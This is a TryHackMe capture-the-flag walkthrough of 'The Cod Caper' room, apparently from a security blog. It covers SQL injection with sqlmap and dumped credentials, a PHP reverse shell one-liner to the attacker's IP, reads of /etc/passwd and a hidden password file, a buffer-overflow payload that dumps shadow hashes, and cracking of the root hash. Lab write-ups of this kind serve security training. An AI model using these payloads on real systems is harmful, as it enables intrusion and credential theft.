Tryhackme - The Cod Caper

Tryhackme – The Cod Caper

In this walk through, we will be going through the The Cod Caper room from Tryhackme. In this room, we will go through the journey of infiltrating and exploiting a Linux system. So without any delay, let’s get started.

The Cod Caper

Machine Info:

TitleThe Caping of Cod
IPaddress10.10.126.161
DifficultyEasy
ObjectiveA guided room taking you through infiltrating and exploiting a Linux system.

Task 1 – Intro

Task 1 - Intro

Task 2 – Host Enumeration

The first step is to see what ports and services are running on the target machine.

Recommended Tool – nmap:

Useful flags:

nmap useful flags

wh1terose@fsociety:~$ sudo nmap -sS -sV -sC 10.10.126.161 

Nmap scan report for 10.10.126.161
Host is up (0.26s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6d:2c:40:1b:6c:15:7c:fc:bf:9b:55:22:61:2a:56:fc (RSA)
|   256 ff:89:32:98:f4:77:9c:09:39:f5:af:4a:4f:08:d6:f5 (ECDSA)
|_  256 89:92:63:e7:1d:2b:3a:af:6c:f9:39:56:5b:55:7e:f9 (ED25519)
-- snipped --


53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

--snipped --

Question 1 – How many ports are open on the target machine?

 2

Question 2 – What is the http-title of the web server?

Apache2 Ubuntu Default Page: It works

Question 3 – What version is the ssh service?

OpenSSH 7.2p2 Ubuntu 4ubuntu2.8

Question 4 – What is the version of the web server?

Apache/2.4.18

Task 2 - Host Enumeration

Task 3 – Web Enumeration

Since the only services running are SSH and Apache, it is safe to assume that we should check out the web server first for possible vulnerabilities. One of the first things to do is to see what pages are available to access on the web server.

Recommended tool: gobuster

Useful flags:

gobuster useful flags

wh1terose@fsociety:~$ gobuster dir -u http://10.10.126.161/ -w ~/Desktop/Wordlist/big.txt -x php,txt,html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.126.161/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,php,txt
[+] Timeout:                 10s
===============================================================
2023/05/09 22:00:07 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.txt        (Status: 403) [Size: 278]
/.htpasswd.php        (Status: 403) [Size: 278]
/.htaccess.html       (Status: 403) [Size: 278]
/.htpasswd.txt        (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.htaccess.php        (Status: 403) [Size: 278]
/.htpasswd.html       (Status: 403) [Size: 278]
/administrator.php    (Status: 200) [Size: 409]
Progress: 13592 / 81912 (16.59%)

gobuster scan

Question 1 – What is the name of the important file on the server?

administrator.php

Task 3 - Web Enumeration

Task 4 – Web Exploitation

The admin page seems to give us a login form. In situations like this it is always worth it to check for “low-hanging fruit”. In the case of login forms one of the first things to check for is SQL Injection.

Recommended Tool: sqlmap

sqlmap useful tools

wh1terose@fsociety:~/Tools/sqlmap-dev$ python3 sqlmap.py -u http://10.10.126.161/administrator.php --forms --dump
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.6.11.10#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:37:09 /2023-05-09/

[22:37:09] [INFO] testing connection to the target URL
[22:37:10] [INFO] searching for forms
[1/1] Form:
POST http://10.10.126.161/administrator.php
POST data: username=&password=
do you want to test this form? [Y/n/q] 
Y
Edit POST data [default: username=&password=] (Warning: blank fields detected): 
do you want to fill blank fields with random values? [Y/n] Y
[22:38:23] [INFO] resuming back-end DBMS 'mysql' 
[22:38:23] [INFO] using '/home/wh1terose/.sqlmap/output/results-05092023_1038pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: username=dYgw' RLIKE (SELECT (CASE WHEN (7626=7626) THEN 0x64596777 ELSE 0x28 END))-- YFJq&password=

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=dYgw' OR (SELECT 3854 FROM(SELECT COUNT(*),CONCAT(0x71707a7a71,(SELECT (ELT(3854=3854,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- TGXB&password=

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: username=dYgw' OR (SELECT 2064 FROM (SELECT(SLEEP(5)))ZgLa)-- YFbf&password=
---
do you want to exploit this SQL injection? [Y/n] 
[22:39:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0
[22:39:07] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[22:39:07] [INFO] fetching current database
[22:39:07] [INFO] resumed: 'users'
[22:39:07] [INFO] fetching tables for database: 'users'
[22:39:08] [INFO] retrieved: 'users'
[22:39:08] [INFO] fetching columns for table 'users' in database 'users'
[22:39:09] [INFO] retrieved: 'username'
[22:39:09] [INFO] retrieved: 'varchar(100)'
[22:39:10] [INFO] retrieved: 'password'
[22:39:12] [INFO] retrieved: 'varchar(100)'
[22:39:12] [INFO] fetching entries for table 'users' in database 'users'
[22:39:12] [INFO] retrieved: 'secretpass'
[22:39:12] [INFO] retrieved: 'pingudad'
Database: users
Table: users
[1 entry]
+------------+----------+
| password   | username |
+------------+----------+
| secretpass | pingudad |
+------------+----------+

[22:39:12] [INFO] table 'users.users' dumped to CSV file '/home/wh1terose/.sqlmap/output/10.10.126.161/dump/users/users.csv'
[22:39:12] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/wh1terose/.sqlmap/output/results-05092023_1038pm.csv'

[*] ending @ 22:39:12 /2023-05-09/

Question 1 – What is the admin username?

pingudad

Question 2 – What is the admin password?

secretpass

Question 3 – How many forms of SQLI is the form vulnerable to?

3

Task 4 - Web Exploitation

Task 5 – Command Execution

It seems we have gained the ability to run commands! Since this is my old PC, I should still have a user account! Let’s run a few test commands, and then try to gain access!

Method 1: nc Reverse shell:

This machine has been outfitted with nc, a tool that allows you to make and receive connections and send data. It is one of the most popular tools to get a reverse shell. Some great places to find reverse shell payloads are highoncoffee and Pentestmonkey

After this you will have to do some additional enumeration to find pingu’s ssh key, or hidden password

Method 2: Hidden passwords:

Assuming my father hasn’t modified since he took over my old PC, I should still have my hidden password stored somewhere,I don’t recall though so you’ll have to find it! find is the recommended tool here as it allows you to search for which files a user specifically owns.

php -r '$sock=fsockopen("10.18.11.103",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Run Command

nc -lvnp 4444

netcat listener

wh1terose@fsociety:~/Tools/sqlmap-dev$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.126.161 36054
/bin/sh: 0: can't access tty; job control turned off
$ ls
2591c98b70119fe624898b1e424b5e91.php
administrator.php
index.html
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
papa:x:1000:1000:qaa:/home/papa:/bin/bash
mysql:x:108:116:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
pingu:x:1002:1002::/home/pingu:/bin/bash

$ find / -type f -name pass 2> /dev/null
/var/hidden/pass
$ cat /var/hidden/pass
pinguapingu
$ 

cat /var/hidden/pass

Task 5 - Command Execution

Task 6 – LinEnum

LinEnum is a bash script that searches for possible ways to priv esc. It is incredibly popular due to the sheer amount of possible methods that it checks for, and often times Linenum is one of the first things to try when you get shell access.

Methods to get Linenum on the system

Method 1: SCP

Since you have ssh access on the machine you can use SCP to copy files over. In the case of Linenum you would run scp {path to linenum} {user}@{host}:{path}. Example: scp /opt/LinEnum.sh [email protected]:/tmp would put LinEnum in /tmp.

Method 2: SimpleHTTPServer

SimpleHTTPServer is a module that hosts a basic webserver on your host machine. Assuming the machine you compromised has a way to remotely download files, you can host LinEnum and download it.

Note: There are numerous ways to do this and the two listed above are just my personal favorites.

Once You have LinEnum on the system, its as simple as running it and looking at the output above once it finishes.

Question 1 – What is the interesting path of the interesting suid file

Linpeas SUID

/opt/secret/root

Task 6 - LinEnum

Task 7 – pwndbg

Luckily for us I was able to snag a copy of the source code from my dad’s flash drive

#include "unistd.h"
#include "stdio.h"   
#include "stdlib.h" 
  
void shell()
{   
 setuid(1000);   
 setgid(1000);   
 system("cat /var/backups/shadow.bak");   
} 
    
void get_input()
{   
 char buffer[32];  
 scanf("%s",buffer);  
 } 
     
int main()
{   
 get_input();   
}`

The SUID file seems to expect 32 characters of input, and then immediately exits. This seems to warrant further investigation. Luckily I was practicing binary exploitation back when I was using that PC, so I have tools preinstalled to examine. One of those tools is pwndbg, a plugin for GDB which allows you to better examine binary files.

Run gdb /opt/secret/root and you should see a screen similar to this

gdb

This means that pwndbg has successfully been initialized. The next step is to test if anything happens when you send more then 32 characters. To do this type r < <(cyclic 50), that command runs the program and provides 50 characters worth of “cyclic” input.

Cyclic input goes like this: “aaaaaaaabaaacaaadaaaeaaaf” etc. Because it’s in this “cyclic” format, it allows us to better understand the control we have over certain registers, for reasons you are about to see.

Once you run that command you should see something similar to this screen

gdb

Now this is where some knowledge of assembly helps. It seems that in this case we’re able to overwrite EIP, which is known as the instruction pointer. The instruction pointer tells the program which bit of memory to execute next, which in an ideal case would have the program run normally. However, since we’re able to overwrite it, we can theoretically execute any part of the program at any time.

Recall the shell function from the source code, if we can overwrite EIP to point to the shell function, we can cause it to execute. This is also where the benefits of cyclic input show themselves. Recall that cyclic input goes in 4 character/byte sequences, meaning we’re able to calculate exactly how many characters we need to provide before we can overwrite EIP.

Luckily cyclic provides this functionality with the -l flag, running cyclic -l {fault address} will tell us exactly how many characters we need to provide we can overwrite EIP.

Running cyclic -l 0x6161616c outputs 44, meaning we can overwrite EIP once we provide 44 characters of input.

That’s all we needed for pre-explotation!

Question 1 – Read the above 🙂

Done

Task 7 - pwndbg

Task 8 – Binary-Exploitaion: Manually

Question 1 – Woohoo!

Done

```bash
(gdb) disassemble shell
Dump of assembler code for function shell:
   0x080484cb <+0>:	push   %ebp
   0x080484cc <+1>:	mov    %esp,%ebp
   0x080484ce <+3>:	sub    $0x8,%esp
   0x080484d1 <+6>:	sub    $0xc,%esp
   0x080484d4 <+9>:	push   $0x3e8
   0x080484d9 <+14>:	call   0x80483a0 <setuid@plt>
   0x080484de <+19>:	add    $0x10,%esp
   0x080484e1 <+22>:	sub    $0xc,%esp
   0x080484e4 <+25>:	push   $0x3e8
   0x080484e9 <+30>:	call   0x8048370 <setgid@plt>
   0x080484ee <+35>:	add    $0x10,%esp
   0x080484f1 <+38>:	sub    $0xc,%esp
   0x080484f4 <+41>:	push   $0x80485d0
   0x080484f9 <+46>:	call   0x8048380 <system@plt>
   0x080484fe <+51>:	add    $0x10,%esp
   0x08048501 <+54>:	nop
   0x08048502 <+55>:	leave  
   0x08048503 <+56>:	ret    
End of assembler dump.

$ python -c 'print "A"*44 + "\xcb\x84\x04\x08"' | /opt/secret/root    
root:$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.:18277:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18277:0:99999:7:::
uuidd:*:18277:0:99999:7:::
papa:$1$ORU43el1$tgY7epqx64xDbXvvaSEnu.:18277:0:99999:7:::
Segmentation fault

Task 8 - Binary-Exploitaion: Manually

Task 9 – Binary Exploitation: The pwntools way

Question 1 – Even more woohoo!

Done

Task 10 – Finishing the job

Now that we have the password hashes, we can crack them and get the root password! Recall from the previous outputs that our root password hash is “$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.“.

Luckily hashcat supports cracking linux password hashes. You can find a list of hashcat modes here and rockyou.txt(a popular wordlist) here (if you don’t already have it on your system)

Recommended tool – Hashcat:

Usage: hashcat {flags} {hashfile} {wordlist}

hashcat useful flags

wh1terose@fsociety:~/CTF/TryHackme/The COD caper$ ~/Tools/john/run/john hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/home/wh1terose/Tools/john/run/password.lst
Enabling duplicate candidate password suppressor
love2fish        (?)     
1g 0:00:00:14 DONE 2/3 (2023-05-09 23:41) 0.06868g/s 8158p/s 8158c/s 8158C/s 652652..ilovemel
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

John Cracking

Question 1 – What is the root password!

love2fish

Task 10 - Finishing the job

Task 11 – Thank you!

Task 11 - Thank you!

Also Read: Tryhackme – Sudo Security Bypass

So that was “The Cod Caper” for you. In this room, we have learned how to infiltrate and exploit a Linux system. We started with basic host enumeration with nmap. Then performed some directory bruteforcing and web enumeration with gobuster. Moving on, we exploited a SQL injection vulnerability and dumped the username and password combo. Further, we exploited a command injection vulnerability and got our initial shell access with netcat. Moving ahead to privilege escalation, we used Linenum, script. At last, we looked into some binary exploitation with Pwntools, pwndgb and gdb. On that note, i will take your leave but stay tuned for the next one and till then, remember to “Hack the planet”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top